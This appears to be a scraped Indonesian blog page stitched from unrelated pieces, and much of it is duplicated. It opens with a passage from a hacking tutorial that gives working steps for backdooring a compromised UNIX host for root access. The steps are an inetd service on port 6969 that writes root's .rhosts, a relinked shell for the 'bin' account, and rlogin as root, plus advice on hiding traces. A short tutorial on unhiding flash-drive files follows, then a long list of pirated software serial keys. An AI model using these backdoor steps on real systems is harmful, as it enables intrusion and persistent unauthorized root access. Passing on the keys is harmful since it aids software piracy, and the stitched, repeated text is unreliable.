tentunya bagi mereka yang sering memanen password entri seperti di atas sudah tidak asing lagi. Account diatas adalah account yang digunakan oleh UNIX sistem secara internal. Seringkali banyak diantara crackers yang mengambil jalan singkat dan menghapus karakter *, mengakibatkan telnet dengan nama login "bin" tidak memerlukan password. Tapi ingatlah bahwa file /etc/passwd biasanya adalah file pertama yang akan diperiksa oleh sang sysadmin saat dia menyadari bahwa sistemnya telah kena susup. Agar kita lebih sulit dideteksi, maka ada baiknya kita buat file .rhosts di home directory milik bin. Kembali ke entri file password diatas, bisa kita lihat bahwa walaupun kita bisa me- rlogin -l bin korban.lameisp.net.id, namun kita masih juga tidak bisa mendapatkan shell sebab account 'bin' dikonfigurasikan untuk menolak penggunaan shell. Cara mengatasi masalah ini tentunya dengan membuat link dari /bin/false ke /bin/sh atau /bin/tcsh. Apa daya seorang sysadmin? Tentunya jika mereka memang keren kung fu nya, sang sysadmin akan mensetup sebuah skrip yang memeriksa keberadaan file-file .rhosts di dalam sebuah sistem. Tak lupa merubah entri dari account-account internal dari /bin/false ke /nggak-ada-tuh atau string unik lainnya yang bukan merupakan nama file.
Metode backdooring lain adalah dengan memanfaatkan "in.rootd" (sebenernya ini hanyalah rekayasa saja, sebab sepanjang pengetahuan kami, nggak ada tuh yang namanya root daemon - tapi metode ini benar-benar cocok disebut rootd) yang pada dasarnya bertugas untuk membuat sebuah lubang masuk lewat salah satu port yang didefinisikan dalam "inetd":
root@korban# echo "ntcp 6969/tcp # Network Traffic Control Protocol" >> /etc/services root@korban# echo "ntcp stream tcp nowait root /bin/sh sh /tmp/crax0r" >> /etc/inetd.conf root@korban# echo "echo indohack2.ri.go.id > ~root/.rhosts" > /tmp/crax0r menjalankan tiga perintah diatas bisa mengakibatkan kompromisasi sistem yang cukup dahsyat, namun tidak akan segera tampak. Penjelasan dari ketiga perintah diatas:
1. Mengaktifkan protokol ntcp di port 6969 (tentunya kamu memilih nomor port lain yang tidak begitu mencurigakan, silakan pilih mulai dari 1024 sampai 65000-an), sedangkan "Network Traffic Control Protocol" adalah karangan kamu sendiri sebab setiap service harus punya nama, dan biasanya sysadmin tidak akan begitu curiga dengan nama seperti itu.
2. Memerintahkan sistem untuk menjalankan perintah /bin/sh sh /tmp/crax0r setiapkali sang sistem menerima koneksi telnet lewat port 6969. Sayangnya mengeksekusi sebuah shell berprivilese root lewat cara ini hanya akan mengakibatkan sang sistem bengong, sebab kita tidak bisa memberikan perintah-perintah selayaknya kita login lewat jalur normal. Sang shell akan tetap dijalankan, namun tidak akan bisa mengeksekusi perintah kita. Untuk itulah kita buat satu skrip di direktori /tmp/crax0r (tentunya kamu lebih pintar dan memilih nama yang tidak begitu mencurigakan seperti /tmp/dev001).
3. Nah, perintah ketiga ini lah yang akan dieksekusi oleh sang shell yang baru saja kita luncurkan (id=0 - root!). Tentunya kamu bisa saja menulis skrip yang lebih kompleks. Namun untuk menghemat tempat, kita lancarkan saja perintah yang sudah dibahas diatas, yaitu menambahkan entri dari mesin host kita ke file .rhosts milik root.
Tentu jika sang admin memang keren kung funya, rlogind akan dikonfigurasikan untuk tidak mengindahkan file .rhosts, namun jika kamu periksa isi direktori dan file "history" milik root dan isinya menunjukkan bahwa sang sysadmin tidak begitu melek soal keamanan, maka metode diatas akan memberikan jalan masuk lewat belakang ke dalam sistem target. Sekarang kamu tinggal: ganjaman@indohack2> telnet korban.lameisp.net.id 6969
Sistem kamu akan tersambung ke sistem target lewat port 6969, sedangkan daemon inet di mesin korban akan menerima sambungan tersebut, menjalankan perintah dalam skrip /tmp/crax0r dengan privilese root, dan dengan segera menutup kembali sambungan telnet. Sekarang .rhosts milik root sudah ditambahi satu entri lagi, yaitu nama host kamu. Untuk kembali menggarap sistem target (sebaiknya dilakukan saat itu juga, sebab sang sysadmin mungkin akan curiga melihat skrip 'asing' dijalankan lewat port 6969) kamu tinggal: ganjaman@indohack2> rlogin -l root korban.lameisp.net.id dan, BOOM! korban#
Shell root tanpa password! (Nah, sekarang kamu boleh kirim surat penggemar ke indohack@hotmail.com, bertitel "Terimakasih, suhu Ganjaman dan SuperCock, atas ilmu ngent... engin badannya ..." :) ). Tapi ingatlah untuk segera menghapus file .rhosts dan jejak jejak lain. Tentunya kalau kung fu kamu emang udah cukup tinggi, teknik menyembunyikan diri dan antideteksi udah bukan barang asing bagi kamu, jadi, jangan lupa aktifkan segala spoofer program, dll. Kalau kamu benar-benar suka mengutak-utik, serangan bisa dibuat dengan lebih tersembunyi lagi, seperti dengan memanfaatkan service-service yang jarang (hampir tidak pernah dipakai) seperti utilitas-utilitas X, segala utilitas berkepala "r", dan banyak lagi.
Metode lain yang cukup populer adalah dengan membuat sebuah file dengan bit SUID tambahan, namun cara ini gampang terdeteksi jika kebetulan sistem mempunyai program audit keamanan yang akan mensensus seluruh file berbit SUID yang terletak diluar lokasi-lokasi wajar (seperti /tmp atau lokasi homedir user). Ide yang lebih mantap lagi adalah dengan memodifikasi suatu program yang sudah berjalan / terinstal secara default, seperti xterm dan splitvt, sehingga sebuah option rootshell akan secara otomatis execv("/bin/sh", "sh", NULL);.
Thursday, July 15, 2010
MENAMPILKAN FOLDER YANG DI HIDDEN OLEH VIRUS DI FD
Jangan kaget ketika anda membuka flashdisk anda kemudian anda tidak menemukan data
Yang menurut anda telah anda simpan dengan baik. Sangat mungkin data tersebut di hidden oleh virus inilah yang biasanya dilakukan oleh virus local, file yang di infeksinya biasanya tidak terhapus tapi hanya di hidden oleh virus tersebut.
Berikut cara mengembalikannya:
1. Buka command prompt (DOS)
bisa via Start –>Run ketik cmd
atau pilih menu Start –> All Program –> Accessories –> command prompt
2. Pindah folder ke drive Flash disk
C:\Documents and Setting\user> e: (nama drive flash disk)
3. Lakukan pengecekan file di flash disk
E:\> dir /a
4. Gunakan syntax atau perintah attrib, untuk menampilkan file yang di hidden oleh virus
E\> attrib -S _H /S /D *
keterangan :
-S : Untuk menghilangkan attrib tipe sistem file
-H : Untuk menghilangkan attrib tipe hidden file
/S : Untuk memproses seluruh folder dan sub folder
/D : Memproses folder
* : Semua file/folder yang terdapat di USB Flashdisk
Setelah file bisa ditampilkan, jangan lupa untuk menghapus semua file application virus yang berekstensi .exe
Yang menurut anda telah anda simpan dengan baik. Sangat mungkin data tersebut di hidden oleh virus inilah yang biasanya dilakukan oleh virus local, file yang di infeksinya biasanya tidak terhapus tapi hanya di hidden oleh virus tersebut.
Berikut cara mengembalikannya:
1. Buka command prompt (DOS)
bisa via Start –>Run ketik cmd
atau pilih menu Start –> All Program –> Accessories –> command prompt
2. Pindah folder ke drive Flash disk
C:\Documents and Setting\user> e: (nama drive flash disk)
3. Lakukan pengecekan file di flash disk
E:\> dir /a
4. Gunakan syntax atau perintah attrib, untuk menampilkan file yang di hidden oleh virus
E\> attrib -S _H /S /D *
keterangan :
-S : Untuk menghilangkan attrib tipe sistem file
-H : Untuk menghilangkan attrib tipe hidden file
/S : Untuk memproses seluruh folder dan sub folder
/D : Memproses folder
* : Semua file/folder yang terdapat di USB Flashdisk
Setelah file bisa ditampilkan, jangan lupa untuk menghapus semua file application virus yang berekstensi .exe
serial number koleksi
3DS Max v3.1 Win9xNT
SN : 110-12345678 CD Key : S4ED6W
ACDSee 4.0 Winall.Regged
654-237-149-322-681-441
ACDSee 4.01
148-817-607-012-681-441 / 711-108-595-288-491-441
ACDSee 5.0
581-076-451-038-881-441
ACDSee 5.0 PowerPack
382-936-064-050-881-441
ACDSee 5.0 Standar
664-828-790-472-030-541
ACDSee 6.0 PowerPack
147-755-260-960-487-541
ACDSee 7.0.43 POWER
4WBDGK-KVP87-F23BT8-JWRN8P8
ACDSee 9.0 BUILD 5.5
DYWDLK-PS6C7-W39CLK-GL9TL23
ACDSee Pro 2.0.219
DB4DVH-3348T-3CLHF7-JB5Y5DZ
Adobe Illustrator 10
1034-1003-4400-0000-1115-2040
Adobe Pagemaker 6.52
03W652R3818820-549
Autocad 2000
Serial : 112-11111111 CD Key : 5X8NUG.
Autocad 2002
Serial : 400-12345678. CD Key : T4ED6P
Borland C++ Builder v.4.0 for Windows
Number : 3448. A Key : 86×8-19×0
COREL Print House 6
PH06WRD-0020403-WQ
COREL R.A.V.E 2
RA02WRD- 0001311-CHE
CORELDRAW 10
D10NR-32542-53T76
CORELDRRAW 11
DR11CRD-0012082-DGW
CORELDRAW 12
DR12WEX-1504397-KTY
WinZip 11 Pro
Name: FIKRUL SETIAWAN
S/N: QARY5-QFLGE-1AQA0-XTJ40-1P358-7LCY3
Adobe Acrobat v8.0 Professional
1118-1341-3925-5595-8141-7680
1016-1992-9210-9981-1392-2870
1118-1719-9236-6727-3285-3211
1016-1757-9008-0389-1405-2509
1118-1295-7743-3899-5988-7217
1016-1553-1956-8803-7545-2920
Adobe Photoshop 6
PWWW600R7105467-948
Adobe Photoshop 7
1045-0203-3247-2217-3566-6177
Adobe Photoshop 8/CS
s/n: ANGKA 1 SEMUA
Adobe Photoshop CS2 v9.0
S/N: 1045-0436-9551-0266-5984-9386
Adobe Photoshop Lightroom v1.0
116044770382008492207154
116045641847731830470143
116045913624002835701237
116047564730034623372249
116040029137790379586954
Adobe Photoshop Lightroom v1.0
1160-4301-7977-0221-2925-0568
Macromedia Dreamweaver 4
DWW400-03771-57289-73501
Macromedia Dreamweaver MX 2004
WPD700-58202-88194-29915
Macromedia Director 8.5
WDW850-02044-87235-26420
Macromedia Freand 11
FHW110-02426-47231-55458
Macromedia Fireworks 4
FWW400-02666-67248-0254
Macromedia Coldfusion MX
CPD600-08480-B7213-22568
Macromedia Flash MX
FLW600-09531-57240-83750
Cyberlink PowerDVD Deluxe v7.0.2211
MMWJC-FRW4Z-677TV-YC8US-ZLYV3-KPW7B
WE8LG-MENE9-QGNVQ-LNPCF-F5AVD-8URP5
28FC9-URJA8-NDJA5-QVPQJ-EEB4M-2FZQM
GLRGH-A6CS6-X8BTA-CGA6A-KHDCK-4KUW4
TGRZP-QQQUU-X49A5-HC9KJ-QSA8S-9PMMP
CyberLink PowerDVD 7
S/N: WTGC3-SBR8C-PWFXA-HAG87-UPXH6-RAYKE 7SJRX-LBFMF-JUH8A-UD88Y-KUNT2-EXUNQ 6XDFP-HRXSM-4J4ZU-C2XBU-EG384-MEEVFGMJLS-EWEUU-TDAGH-R7XUU-JNG4X-KPFXR 824RZ-WQA6F-RBVAM-5W9N8-EX3HL-QDU42
CYBERLINK DVDSUITE PRO V.5
MS595725518122J4
FLASH 5
FLW500-03143-77238-80660
FLASH 6
FLW600-11335-72240-33333
FLASH MX
FLW600-53733-75540-61552
HOY QUR’AN 7,1
N1A6-N0A9
COREL PRINT HOUSE 6
PH06WRD-0020403-WQF
DELPHI 5
111-111-1111 CODE= FEX1-91X0
DELPHI 6
Z9J8-PUM4N-C6GZQ CDKEY= RW2-7JW
DELPHI 7
GAKD-PD29Q9-RDF?JQ-X65Z
CD KEY = QY8.EEC
Dfx Winamp 8
Email: rabcodemax@yahoo.com
Serial number: MA2443456
DSL Speed v3.8
User Name : TEAM TBE
Serial : PDDI33L6JTW6
Google Earth Pro
Name: Shinder Jandu
S/N: JCPM7DVNY6MRE3G
Password: 123456789
Kaspersky 6.0
S/N: tybgedtyhr4rthtyh
Kaspersky Internet Security v6.0.1.411
DZ3A3-7XGVU-DH1YX-NXJYP
Microsoft Office 2003
GWH28-DGCMP-P6RC4-6J4MT-3HFDY
Microsoft Frontpage 2003
WFDWY-XQXJF-RHRYG-BG7RQ-BBDHM
Folder Lock 5.7.3
Name: james smith
S/N: 343944892
Counter-Strike
5Z62E-MTXQZ-Z32IY-NW2ZL-A3C4Q
Microsoft Office 2007
KGFVY-7733B-8WCK9-KTG64-BC7D8
Microsoft Office 2007 Pro
TT3M8-H3469-V89G6-8FWK7-D3Q9Q
Microsoft Office Professional 2007 Enterprise
KGFVY-7733B-8WCK9-KTG64-BC7D8
Microsoft Windows XP Profesional SP 2
WGP2M-G8M6T-BT7D4-P7RY7-27K76
VYKFM-8WQD3-PQC2R-MB9YV-X3JFG
k2kb2-bdbgv-kp686-d8t7x-hdmq8
Microsoft Windows XP Professional
S/N: FCKGW RHQQ2 YXRKT 8TG6W 2B7Q8
Microsoft Office 2007 Enterprise
KGFVY-7733B-8WCK9-KTG64-BC7D8
Microsoft Windows Vista Ultimate
YFKBB-PQJJV-G996G-VWGXY-2V3X8
Windows Vista
YFKBB-PQJJV-G996G-VWGXY-2V3X8
Microsoft Windows Vista 2006
Name: cristi suta
S/N: TCP8W-T8PQJ-WWRRH-QH76C-99FBW
Nero 7 Premium Reloaded v7.5.9.0A
1C80-0000-19E5-MA2X-4001-1324-3931
1C80-0000-19E5-MA2X-4008-6459-9954
1C80-0000-19E5-MA2X-4008-9974-0906
1C80-0000-19E5-MA2X-4005-9931-5336
1C80-0000-19E5-MA2X-4008-5823-0671
Nero 7 Premium Reloaded v7.8.5.0
1C80-0000-19E5-MA2X-4003-8871-9910
Nero 7 Premium Reloaded v7.7.5.1
1C82-0020-19E5-M45X-0FFF-93D9-0BD4
1C82-0020-19E5-M45X-0FFF-GC89-D3N4
1C82-0020-19E5-M45X-0FFF-2X95-1I5J
1C82-0020-19E5-M45X-0FFF-ARA0-0ASR
1C82-0020-19E5-M45X-0FFF-7RLG-K8G7
Nero 7 Premium Reloaded v7.5.9.1
1C81-0020-19E5-M31X-E42S-D217-7935
Nero Burning Rom v.5044
1500-0001-0053-0316-2508-6123
Nero Burning Rom v.5.5.5.1 for WinXP
1503-0947-6845-2627-4181-1200
NERO 6
1A23-0006-7130-1204-8976-4901
NERO 6.3
1A25-0006-7130-1352-4239-7903
NERO 6.6
1A25-0006-7130-1827-2429-2198
NERO 7.7.5.1 PREMIUM ED
1C80-0014-19E5-MA2X-400C-4X27-4A50
Norton AntiVirus 2007
Product Key: V4FHRMHYH7PR8FF9PY46J3DDC Activation: XHHCWFWH7KTC
NOD32 All Serials Any
S/N: Name: AV-2364945
S/N: jubqqrjsa2Name: AV-2267079Password : m7auys7jphUser: AV-2593035Password: merjvieno1Name: AV-2230918Serial: 48rf4ieot2″Username: En-2007224 Password: nx1qs5myj6Name: FiENdisH_MBS/N: Name: AV-2267079Pastry all…
Power DVD 5.0
MV588995988G2285
Power DVD 7.0
Name: S.M Nafis Akhtar
S/N: WTGC3-SBR8C-PWFXA-HAG87-UPXH6-RAYKE 7SJRX-LBFMF-JUH8A-UD88Y-KUNT2-EXUNQ-6XDFP-HRXSM-4J4ZU-C2XBU-EG384-MEEVFGMJLS-EWEUU-TDAGH-R7XUU-JNG4X-KPFXR
SpeedUpMyPC v3.0
00XHEH-M5TY2P-QEZJWB-V8UUHN
Spyware Doctor 4.0.0.2618
Name: craig martindaleS/N: A962-19A8-4171-D2BE-0BAF-5010-7810-23C0-7577-6FFE
Super DVD Creator v9.30
SDCMM-124272-881221-362392-341621
SDCMM-064745-114192-730109-921381
SDCMM-112154-175236-561511-642441
SDCMM-625237-169174-441194-723975
SDCMM-431046-156136-178255-201392
Spyware Doctor v5.0.0.147
Name : Thomas Grassmann
Serial : BFA2-D53B-A6C7-A08B-B95E-C2DD-30F4-8E64-49CF-7E10
Tune UP Utilites 2008 Free
Name : Merc {REA}
Comp : Team REA
Serial :
BG9UX-YU8NC-1D84W-BQ9GG-47XBN-GAANJ
N5QVM-TJBA3-CHGBB-VN5ED-2VEEV-6BSYN
BVU9X-A8DQE-75Y6U-PXV97-QHBTY-GBSN6
GJX91-X2X4Q-GQQAN-F7R79G8EM-CFSNU
23NF9-ALT3M-L1YYU-HEMJF-QYS6W
Trojan Remover v6.5.5
Username: Nancy Stephens
Licence Key: 000015-YBW39A-9BFFWM-GA26J3-15HY2T-XGDJQT-4U7VNA-ZC4TMG-J4JVN0-WQHD66
TuneUp Utilities 2007 v6.0.1255.0
Name :BUBlic
Company :TSRh
Serial :6THVJ-XKL6J-XV6L3-8EP52-FBDF8-SFSXU
Uniblue Registry Booster v1.3
00X242-JJ5YYP-5Z8Z6C-7570NG
WINDOWS VISTA :
Windows Vista Business —- J9QVT-JJMB9-RVJ38-M8KT6-DMT9M
Windows Vista Home Basic — KJTCW-YQGRK-XPQMR-YTQG8-DKVG6
Windows Vista Home Basic N — YQWWH-2YD6Y-V3K2X-H4H8V-WJ8WT
Windows Vista Home Premium — PYYBC-K9XT9-V92KD-6CT89-4VB82
Windows Vista Ultimate —- PVVFY-2F78Q-8T7M8-HDQB2-BR3YT
Windows Vista Enterprise —- CYD8T-QHBMC-6RCMK-4GHRD-CRRB7
Windows Vista 2006
Name: cristi suta
S/N: TCP8W-T8PQJ-WWRRH-QH76C-99FBW
Windows XP :
Windows XP Home Edition K —- W8F6Q-HM3JB-2XRHD-7Q92J-XKY6W
Windows XP Home Edition KN — M9D9J-2TQV2-FBJQP-2M8G8-DGQ26
Windows XP Media Center Edition — H23CJ-2WXM9-M9D2K-42226-DJWRD
Windows XP Professional Edition K — FRH2X-6VD7F-YH2TV-2V8B7-J46F6
Windows XP Professional Edition KN - QKBGY-T8JFG-F448Q-24KR9-48XPJ
Windows XP Home Edition —- GHGCP-3KFC6-Y4J4D-MVG7V-67TV6
Windows XP Professional —– F9QV9-HDYR3-6QDR4-PGVW9-GTBBJ
Windows XP Professional IA64 Edition - BGVXG-CM3VK-FX848-B9JPY-YJJXD
Windows XP Professional x64 Edition - PFFY7-Y9RRY-MT6C7-XMQPK-RWFCW
Windows XP Tablet PC Edition — WFMYK-68Y2T-JD473-W8DMW-8PFHQ
WINDOWS 2000 :
Windows 2000 Professional —- DDTPV-TXMX7-BBGJ9-WGY8K-B9GHM
Windows 2000 Server (All Versions) — KRJQ8-RQ822-YRMXF-6TTXC-HD2VM
Xingtone Ringtone Maker v5.0.0
PI74-1013-GABQ-3306
Your Uninstaller! Pro 2006 v5.0.0.259
Name: PAUL J DEVENZIO
Code: 000016-QA36H2-XW5PPB-6RB7J2-BZ1FJ8-KJQBE9-C2F81Q-FKFEAN-Y5WFRP-EPMHYT
TRANSTOOL 5
100706-27816-08499520-03
Universal Translator
EWB3APACDVBGYT2ENZJX
ULEAD COOL 3D STUDIO
274A5-11085-78578888
ULEAD MEDIA STUDIO PRO 7.0
011A2-27042-0190DCN14
ULEAD MOVIE FACORY 2.0
111A2-62000-00300082
ULEAD PHOTO IMPACT XL
111A3-08500-00002098
ULEAD VIDEO STUDIO 7
RORA2-870RO-ROROROR1
ULEAD PHOTO IMPACT
11103-07000-00001531S
VCD CUTER V.4.03 RETAIL
017697-023393
VISUAL BASIC 5.0
425-1689004
VISUAL BASIC 6 PRO
422-1111111
VISIO 2003
WFDWY-XQXJF-RHRYG-BG7RQ-BBHDM
SN : 110-12345678 CD Key : S4ED6W
ACDSee 4.0 Winall.Regged
654-237-149-322-681-441
ACDSee 4.01
148-817-607-012-681-441 / 711-108-595-288-491-441
ACDSee 5.0
581-076-451-038-881-441
ACDSee 5.0 PowerPack
382-936-064-050-881-441
ACDSee 5.0 Standar
664-828-790-472-030-541
ACDSee 6.0 PowerPack
147-755-260-960-487-541
ACDSee 7.0.43 POWER
4WBDGK-KVP87-F23BT8-JWRN8P8
ACDSee 9.0 BUILD 5.5
DYWDLK-PS6C7-W39CLK-GL9TL23
ACDSee Pro 2.0.219
DB4DVH-3348T-3CLHF7-JB5Y5DZ
Adobe Illustrator 10
1034-1003-4400-0000-1115-2040
Adobe Pagemaker 6.52
03W652R3818820-549
Autocad 2000
Serial : 112-11111111 CD Key : 5X8NUG.
Autocad 2002
Serial : 400-12345678. CD Key : T4ED6P
Borland C++ Builder v.4.0 for Windows
Number : 3448. A Key : 86×8-19×0
COREL Print House 6
PH06WRD-0020403-WQ
COREL R.A.V.E 2
RA02WRD- 0001311-CHE
CORELDRAW 10
D10NR-32542-53T76
CORELDRRAW 11
DR11CRD-0012082-DGW
CORELDRAW 12
DR12WEX-1504397-KTY
WinZip 11 Pro
Name: FIKRUL SETIAWAN
S/N: QARY5-QFLGE-1AQA0-XTJ40-1P358-7LCY3
Adobe Acrobat v8.0 Professional
1118-1341-3925-5595-8141-7680
1016-1992-9210-9981-1392-2870
1118-1719-9236-6727-3285-3211
1016-1757-9008-0389-1405-2509
1118-1295-7743-3899-5988-7217
1016-1553-1956-8803-7545-2920
Adobe Photoshop 6
PWWW600R7105467-948
Adobe Photoshop 7
1045-0203-3247-2217-3566-6177
Adobe Photoshop 8/CS
s/n: ANGKA 1 SEMUA
Adobe Photoshop CS2 v9.0
S/N: 1045-0436-9551-0266-5984-9386
Adobe Photoshop Lightroom v1.0
116044770382008492207154
116045641847731830470143
116045913624002835701237
116047564730034623372249
116040029137790379586954
Adobe Photoshop Lightroom v1.0
1160-4301-7977-0221-2925-0568
Macromedia Dreamweaver 4
DWW400-03771-57289-73501
Macromedia Dreamweaver MX 2004
WPD700-58202-88194-29915
Macromedia Director 8.5
WDW850-02044-87235-26420
Macromedia Freand 11
FHW110-02426-47231-55458
Macromedia Fireworks 4
FWW400-02666-67248-0254
Macromedia Coldfusion MX
CPD600-08480-B7213-22568
Macromedia Flash MX
FLW600-09531-57240-83750
Cyberlink PowerDVD Deluxe v7.0.2211
MMWJC-FRW4Z-677TV-YC8US-ZLYV3-KPW7B
WE8LG-MENE9-QGNVQ-LNPCF-F5AVD-8URP5
28FC9-URJA8-NDJA5-QVPQJ-EEB4M-2FZQM
GLRGH-A6CS6-X8BTA-CGA6A-KHDCK-4KUW4
TGRZP-QQQUU-X49A5-HC9KJ-QSA8S-9PMMP
CyberLink PowerDVD 7
S/N: WTGC3-SBR8C-PWFXA-HAG87-UPXH6-RAYKE 7SJRX-LBFMF-JUH8A-UD88Y-KUNT2-EXUNQ 6XDFP-HRXSM-4J4ZU-C2XBU-EG384-MEEVFGMJLS-EWEUU-TDAGH-R7XUU-JNG4X-KPFXR 824RZ-WQA6F-RBVAM-5W9N8-EX3HL-QDU42
CYBERLINK DVDSUITE PRO V.5
MS595725518122J4
FLASH 5
FLW500-03143-77238-80660
FLASH 6
FLW600-11335-72240-33333
FLASH MX
FLW600-53733-75540-61552
HOY QUR’AN 7,1
N1A6-N0A9
COREL PRINT HOUSE 6
PH06WRD-0020403-WQF
DELPHI 5
111-111-1111 CODE= FEX1-91X0
DELPHI 6
Z9J8-PUM4N-C6GZQ CDKEY= RW2-7JW
DELPHI 7
GAKD-PD29Q9-RDF?JQ-X65Z
CD KEY = QY8.EEC
Dfx Winamp 8
Email: rabcodemax@yahoo.com
Serial number: MA2443456
DSL Speed v3.8
User Name : TEAM TBE
Serial : PDDI33L6JTW6
Google Earth Pro
Name: Shinder Jandu
S/N: JCPM7DVNY6MRE3G
Password: 123456789
Kaspersky 6.0
S/N: tybgedtyhr4rthtyh
Kaspersky Internet Security v6.0.1.411
DZ3A3-7XGVU-DH1YX-NXJYP
Microsoft Office 2003
GWH28-DGCMP-P6RC4-6J4MT-3HFDY
Microsoft Frontpage 2003
WFDWY-XQXJF-RHRYG-BG7RQ-BBDHM
Folder Lock 5.7.3
Name: james smith
S/N: 343944892
Counter-Strike
5Z62E-MTXQZ-Z32IY-NW2ZL-A3C4Q
Microsoft Office 2007
KGFVY-7733B-8WCK9-KTG64-BC7D8
Microsoft Office 2007 Pro
TT3M8-H3469-V89G6-8FWK7-D3Q9Q
Microsoft Office Professional 2007 Enterprise
KGFVY-7733B-8WCK9-KTG64-BC7D8
Microsoft Windows XP Profesional SP 2
WGP2M-G8M6T-BT7D4-P7RY7-27K76
VYKFM-8WQD3-PQC2R-MB9YV-X3JFG
k2kb2-bdbgv-kp686-d8t7x-hdmq8
Microsoft Windows XP Professional
S/N: FCKGW RHQQ2 YXRKT 8TG6W 2B7Q8
Microsoft Office 2007 Enterprise
KGFVY-7733B-8WCK9-KTG64-BC7D8
Microsoft Windows Vista Ultimate
YFKBB-PQJJV-G996G-VWGXY-2V3X8
Windows Vista
YFKBB-PQJJV-G996G-VWGXY-2V3X8
Microsoft Windows Vista 2006
Name: cristi suta
S/N: TCP8W-T8PQJ-WWRRH-QH76C-99FBW
Nero 7 Premium Reloaded v7.5.9.0A
1C80-0000-19E5-MA2X-4001-1324-3931
1C80-0000-19E5-MA2X-4008-6459-9954
1C80-0000-19E5-MA2X-4008-9974-0906
1C80-0000-19E5-MA2X-4005-9931-5336
1C80-0000-19E5-MA2X-4008-5823-0671
Nero 7 Premium Reloaded v7.8.5.0
1C80-0000-19E5-MA2X-4003-8871-9910
Nero 7 Premium Reloaded v7.7.5.1
1C82-0020-19E5-M45X-0FFF-93D9-0BD4
1C82-0020-19E5-M45X-0FFF-GC89-D3N4
1C82-0020-19E5-M45X-0FFF-2X95-1I5J
1C82-0020-19E5-M45X-0FFF-ARA0-0ASR
1C82-0020-19E5-M45X-0FFF-7RLG-K8G7
Nero 7 Premium Reloaded v7.5.9.1
1C81-0020-19E5-M31X-E42S-D217-7935
Nero Burning Rom v.5044
1500-0001-0053-0316-2508-6123
Nero Burning Rom v.5.5.5.1 for WinXP
1503-0947-6845-2627-4181-1200
NERO 6
1A23-0006-7130-1204-8976-4901
NERO 6.3
1A25-0006-7130-1352-4239-7903
NERO 6.6
1A25-0006-7130-1827-2429-2198
NERO 7.7.5.1 PREMIUM ED
1C80-0014-19E5-MA2X-400C-4X27-4A50
Norton AntiVirus 2007
Product Key: V4FHRMHYH7PR8FF9PY46J3DDC Activation: XHHCWFWH7KTC
NOD32 All Serials Any
S/N: Name: AV-2364945
S/N: jubqqrjsa2Name: AV-2267079Password : m7auys7jphUser: AV-2593035Password: merjvieno1Name: AV-2230918Serial: 48rf4ieot2″Username: En-2007224 Password: nx1qs5myj6Name: FiENdisH_MBS/N: Name: AV-2267079Pastry all…
Power DVD 5.0
MV588995988G2285
Power DVD 7.0
Name: S.M Nafis Akhtar
S/N: WTGC3-SBR8C-PWFXA-HAG87-UPXH6-RAYKE 7SJRX-LBFMF-JUH8A-UD88Y-KUNT2-EXUNQ-6XDFP-HRXSM-4J4ZU-C2XBU-EG384-MEEVFGMJLS-EWEUU-TDAGH-R7XUU-JNG4X-KPFXR
SpeedUpMyPC v3.0
00XHEH-M5TY2P-QEZJWB-V8UUHN
Spyware Doctor 4.0.0.2618
Name: craig martindaleS/N: A962-19A8-4171-D2BE-0BAF-5010-7810-23C0-7577-6FFE
Super DVD Creator v9.30
SDCMM-124272-881221-362392-341621
SDCMM-064745-114192-730109-921381
SDCMM-112154-175236-561511-642441
SDCMM-625237-169174-441194-723975
SDCMM-431046-156136-178255-201392
Spyware Doctor v5.0.0.147
Name : Thomas Grassmann
Serial : BFA2-D53B-A6C7-A08B-B95E-C2DD-30F4-8E64-49CF-7E10
Tune UP Utilites 2008 Free
Name : Merc {REA}
Comp : Team REA
Serial :
BG9UX-YU8NC-1D84W-BQ9GG-47XBN-GAANJ
N5QVM-TJBA3-CHGBB-VN5ED-2VEEV-6BSYN
BVU9X-A8DQE-75Y6U-PXV97-QHBTY-GBSN6
GJX91-X2X4Q-GQQAN-F7R79G8EM-CFSNU
23NF9-ALT3M-L1YYU-HEMJF-QYS6W
Trojan Remover v6.5.5
Username: Nancy Stephens
Licence Key: 000015-YBW39A-9BFFWM-GA26J3-15HY2T-XGDJQT-4U7VNA-ZC4TMG-J4JVN0-WQHD66
TuneUp Utilities 2007 v6.0.1255.0
Name :BUBlic
Company :TSRh
Serial :6THVJ-XKL6J-XV6L3-8EP52-FBDF8-SFSXU
Uniblue Registry Booster v1.3
00X242-JJ5YYP-5Z8Z6C-7570NG
WINDOWS VISTA :
Windows Vista Business —- J9QVT-JJMB9-RVJ38-M8KT6-DMT9M
Windows Vista Home Basic — KJTCW-YQGRK-XPQMR-YTQG8-DKVG6
Windows Vista Home Basic N — YQWWH-2YD6Y-V3K2X-H4H8V-WJ8WT
Windows Vista Home Premium — PYYBC-K9XT9-V92KD-6CT89-4VB82
Windows Vista Ultimate —- PVVFY-2F78Q-8T7M8-HDQB2-BR3YT
Windows Vista Enterprise —- CYD8T-QHBMC-6RCMK-4GHRD-CRRB7
Windows Vista 2006
Name: cristi suta
S/N: TCP8W-T8PQJ-WWRRH-QH76C-99FBW
Windows XP :
Windows XP Home Edition K —- W8F6Q-HM3JB-2XRHD-7Q92J-XKY6W
Windows XP Home Edition KN — M9D9J-2TQV2-FBJQP-2M8G8-DGQ26
Windows XP Media Center Edition — H23CJ-2WXM9-M9D2K-42226-DJWRD
Windows XP Professional Edition K — FRH2X-6VD7F-YH2TV-2V8B7-J46F6
Windows XP Professional Edition KN - QKBGY-T8JFG-F448Q-24KR9-48XPJ
Windows XP Home Edition —- GHGCP-3KFC6-Y4J4D-MVG7V-67TV6
Windows XP Professional —– F9QV9-HDYR3-6QDR4-PGVW9-GTBBJ
Windows XP Professional IA64 Edition - BGVXG-CM3VK-FX848-B9JPY-YJJXD
Windows XP Professional x64 Edition - PFFY7-Y9RRY-MT6C7-XMQPK-RWFCW
Windows XP Tablet PC Edition — WFMYK-68Y2T-JD473-W8DMW-8PFHQ
WINDOWS 2000 :
Windows 2000 Professional —- DDTPV-TXMX7-BBGJ9-WGY8K-B9GHM
Windows 2000 Server (All Versions) — KRJQ8-RQ822-YRMXF-6TTXC-HD2VM
Xingtone Ringtone Maker v5.0.0
PI74-1013-GABQ-3306
Your Uninstaller! Pro 2006 v5.0.0.259
Name: PAUL J DEVENZIO
Code: 000016-QA36H2-XW5PPB-6RB7J2-BZ1FJ8-KJQBE9-C2F81Q-FKFEAN-Y5WFRP-EPMHYT
TRANSTOOL 5
100706-27816-08499520-03
Universal Translator
EWB3APACDVBGYT2ENZJX
ULEAD COOL 3D STUDIO
274A5-11085-78578888
ULEAD MEDIA STUDIO PRO 7.0
011A2-27042-0190DCN14
ULEAD MOVIE FACORY 2.0
111A2-62000-00300082
ULEAD PHOTO IMPACT XL
111A3-08500-00002098
